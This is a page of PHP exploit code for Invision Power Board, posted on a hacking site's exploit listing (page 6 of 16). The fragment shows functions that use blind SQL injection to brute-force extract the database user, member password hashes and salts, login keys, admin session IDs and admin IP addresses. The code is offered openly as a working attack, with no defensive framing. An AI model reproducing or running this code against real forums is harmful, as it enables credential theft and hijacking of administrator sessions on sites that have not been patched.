You are here: hacking technology > Exploit > Content
Hot Articles
Recommend Articles
New Articles
Invision Power Board(6)
  Add date: 10/16/2008   Publishing date: 10/16/2008   Hits: 8
Total 16 pages, Current page:6, Jump to page:
 

$this->t_join            = 't.id=m.id';
$this->t_char            = $this->chr_md5;
$this->data['login_key'] = $this->bf_inj();

return $this->key_val;
}

function get_sql_user()
{
$this->init_sql();

$this->t_key             = 'user()';
$this->t_table           = 'members';
$this->t_field           = 'user()';
$this->t_char            = $this->chr_all;
$this->t_end             = '@';
$this->data['sql_user']  = $this->bf_inj();

return $this->key_val;
}

function get_pass_hash()
{
$this->init_sql();

$this->t_key             = 'pass_hash';
$this->t_table           = 'members_converge';
$this->t_field           = 't.converge_pass_hash';
$this->t_join            = 't.converge_email=m.email';
$this->t_char            = $this->chr_md5;
$this->data['pass_hash'] = $this->bf_inj();

return $this->key_val;
}

function get_pass_salt()
{
$this->init_sql();

$this->t_key             = 'pass_salt';
$this->t_table           = 'members_converge';
$this->t_field           = 't.converge_pass_salt';
$this->t_join            = 't.converge_email=m.email';
$this->t_char            = $this->chr_all;
$this->data['pass_salt'] = $this->bf_inj();

return $this->key_val;
}

function get_admin_sess()
{
$this->init_sql();

$this->t_key             = 'admin_sid';
$this->t_table           = 'admin_sessions';
$this->t_field           = 't.session_id';
$this->t_join            = 't.session_member_id=m.id';
$this->t_sel             = 't.session_log_in_time';
$this->t_char            = $this->chr_md5;
$this->data['a_sess_id'] = $this->bf_inj();

return $this->key_val;
}

function get_admin_ip()
{
$this->init_sql();

$this->t_key             = 'admin_ip';
$this->t_table           = 'admin_sessions';
$this->t_field           = 't.session_ip_address';
$this->t_join            = 't.session_member_id=m.id';
$this->t_sel             = 't.session_log_in_time';
$this->t_char            = $this->chr_ip;
$this->data['a_ip_addr'] = $this->bf_inj();

return $this->key_val;

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * 11 * 12 * 13 * 14 * 15 * 16 * Next>>
Prev:Invision Power Board Next:Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BOF Exploit

Comment:

Category: Home > Exploit